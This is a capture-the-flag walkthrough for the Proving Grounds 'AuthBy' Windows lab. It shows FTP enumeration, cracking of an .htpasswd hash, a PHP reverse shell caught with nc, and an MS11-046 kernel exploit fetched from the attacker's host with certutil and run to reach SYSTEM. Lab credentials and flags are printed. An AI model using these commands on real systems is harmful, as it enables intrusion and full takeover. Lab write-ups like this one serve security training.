Proving Grounds - AuthBy (Windows)

Proving Grounds AuthBy Windows walkthrough covering FTP enumeration, credential cracking, PHP reverse shell, and MS11-046 kernel exploit.

Posted Mar 11, 2026

By Paul

4 min read

Overview

Field	Value
OS	Windows
Difficulty	Not specified
Attack Surface	FTP and HTTP Basic Auth web application
Primary Entry Vector	FTP credential discovery → .htpasswd crack → PHP reverse shell
Privilege Escalation Path	MS11-046 (CVE-2011-1249) kernel exploit → SYSTEM

Credentials

Username	Password	Source
admin	admin	FTP (zFTPServer)
offsec	elite	.htpasswd cracked via John the Ripper

Reconnaissance

💡 Why this works This stage maps the reachable attack surface and identifies where exploitation is most likely to succeed. Accurate service and content discovery reduces blind testing and drives targeted follow-up actions.

  
rustscan -a $ip -r 1-65535 --ulimit 5000

Open 192.168.178.46:21
Open 192.168.178.46:242

  
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
242/tcp  open  http          Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-title: 401 Authorization Required
| http-auth:
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
3145/tcp open  zftp-admin    zFTPServer admin
3389/tcp open  ms-wbt-server Microsoft Terminal Service

Initial Foothold

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

FTP anonymous login revealed account directories:

cat accounts/backup/.listing

  
total 4
----------   1 root     root          764 Jul 10  2020 acc[Offsec].uac
----------   1 root     root         1030 Jul 10  2020 acc[anonymous].uac
----------   1 root     root          926 Jul 10  2020 acc[admin].uac

  
ftp $ip
# login as admin:admin
ftp> ls

  
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess

.htpasswd contained an MD5crypt hash:

cat .htpasswd

offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

  
echo '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

  
elite            (?)
1g 0:00:00:00 DONE (2026-03-09 00:27)

Authenticated to the web app as offsec:elite. Since the web root was writable via FTP, a PHP reverse shell was uploaded:

https://github.com/ivan-sincek/php-reverse-shell

nc -lvnp 4444

  
connect to [192.168.45.166] from (UNKNOWN) [192.168.178.46] 49174
SOCKET: Shell has connected! PID: 1100
Microsoft Windows [Version 6.0.6001]

C:\wamp\bin\apache\Apache2.2.21>

Retrieved local.txt:

  
c:\Users\apache\Desktop>type local.txt
8f58872cf8fd5b801fcc334dcb29d8c6

💡 Why this works The initial access step chains discovered weaknesses into executable control over the target. Successful foothold techniques are validated by command execution or interactive shell callbacks.

Privilege Escalation

systeminfo revealed Windows Server 2008 SP1 with no hotfixes applied:

  
c:\Users\apache\Downloads\win_tool>systeminfo

OS Name:    Microsoft Windows Server 2008 Standard
OS Version: 6.0.6001 Service Pack 1 Build 6001
System Type: X86-based PC
Hotfix(s):  N/A

MS11-046 (CVE-2011-1249) was applicable — the exploit binary was available locally:

locate MS11-046

/home/n0z0/tools/windows/windows-kernel-exploits/MS11-046/ms11-046.exe

Transfer and execute:

  
# Attacker
python3 -m http.server 8001

# Target
certutil -urlcache -split -f http://192.168.45.166:8001/ms11-046.exe ms11-046.exe
ms11-046.exe

  
c:\Users\Administrator\Desktop>type proof.txt
978ccf87a8064985b1a24df3f8417959

💡 Why this works Privilege escalation relies on local misconfigurations, unsafe permissions, and trusted execution paths. Enumerating and abusing these trust boundaries is the fastest route to root-level access.

Lessons Learned / Key Takeaways

Never use default or weak credentials (admin:admin) on FTP or administrative services.
Store .htpasswd files outside the web-accessible FTP root or restrict read access.
Apply security patches promptly — an unpatched Windows Server 2008 is trivially exploitable.
Restrict FTP write access to prevent web shell uploads to the web root.

Attack Flow

flowchart LR

subgraph SCAN["🔍 Scan"]
direction TB
S1["Rustscan / Nmap\nPORT: 21/FTP, 242/HTTP\n3145/zFTP-admin, 3389/RDP"]
S2["FTP Anonymous\naccounts/ 発見\nadmin:admin 認証"]
S1 --> S2
end

subgraph INITIAL["💥 Initial Access"]
direction TB
I1["FTP(admin:admin)\n.htpasswd 取得\noffsec:$apr1$oRfRsc/K$..."]
I2["John the Ripper\nrockyou.txt\nelite クラック成功"]
I3["PHP Reverse Shell\nFTPアップロード\nivan-sincek版(PHP5対応)"]
I4["nc -lvnp 4444\nSHELL取得\nlivda\\apache"]
I5["local.txt\n8f58872cf8fd5b801fcc334dcb29d8c6"]
I1 --> I2 --> I3 --> I4 --> I5
end

subgraph PRIVESC["⬆️ Privilege Escalation"]
direction TB
P1["systeminfo\nServer 2008 SP1 x86\nHotfix: N/A"]
P2["SeImpersonate確認\nGodPotato試行\ncombase.dll非対応で失敗"]
P3["wesng / searchsploit\nCVE-2011-1249(MS11-046)\nKB2503665 未適用確認"]
P4["locate MS11-046\nms11-046.exe 発見\nwindows-kernel-exploits/"]
P5["python3 -m http.server 8001\ncertutil -urlcache -split -f\nms11-046.exe ダウンロード"]
P6["ms11-046.exe 実行\nNT AUTHORITY\\SYSTEM 昇格"]
P7["proof.txt\n978ccf87a8064985b1a24df3f8417959"]
P1 --> P2 --> P3 --> P4 --> P5 --> P6 --> P7
end

SCAN --> INITIAL --> PRIVESC

References

CVE-2011-1249 (MS11-046): https://nvd.nist.gov/vuln/detail/CVE-2011-1249
MS11-046 Exploit: https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046
PHP Reverse Shell (ivan-sincek): https://github.com/ivan-sincek/php-reverse-shell
RustScan: https://github.com/RustScan/RustScan
Nmap: https://nmap.org/
John the Ripper: https://www.openwall.com/john/

Proving Grounds, Windows

This post is licensed under CC BY 4.0 by the author.